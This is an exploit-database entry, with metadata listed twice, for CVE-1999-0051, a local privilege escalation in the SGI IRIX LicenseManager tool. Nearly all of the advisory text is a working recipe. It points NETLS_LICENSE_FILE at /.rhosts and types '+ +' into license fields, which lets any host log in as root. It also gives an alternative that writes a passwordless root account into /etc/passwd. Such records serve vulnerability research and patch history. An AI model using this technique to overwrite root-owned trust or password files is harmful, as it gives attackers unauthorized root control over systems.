SGI IRIX 5.3/6.2 / SGI license_oeo 1.0 LicenseManager - 'NETLS_LICENSE_FILE' Local Privilege Escalation
Author: Arthur Hagen
type: local
platform: irix
port:
date_added: 1996-04-05
date_updated: 2012-06-11
verified: 1
codes: OSVDB-897;CVE-1999-0051
tags:
aliases:
screenshot_url:
application_url:
raw file: 19066.txt
type: local
platform: irix
port:
date_added: 1996-04-05
date_updated: 2012-06-11
verified: 1
codes: OSVDB-897;CVE-1999-0051
tags:
aliases:
screenshot_url:
application_url:
raw file: 19066.txt
source: https://www.securityfocus.com/bid/72/info Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to overwrite root-owned files allowing root access. % setenv NETLS_LICENSE_FILE /.rhosts % /usr/etc/LicenseManager & Install... NetLS Node-locked Vendor Name: whatever Vendor ID: + + Product name: whatever License version: 1.000 License version: Expiration date: 01-jan-0 (in license version field put a space) Apply License(s) succesfully installed % cat /.rhosts #:# "whatever" "whatever" "1.000" "Incomplete" + + If your system has remote root logins disabled, replacing /.rhosts with /etc/passwd and + + with toor:0:0::/:/bin/sh.
Copyright © 2024 Irfan TOOR all rights reserved.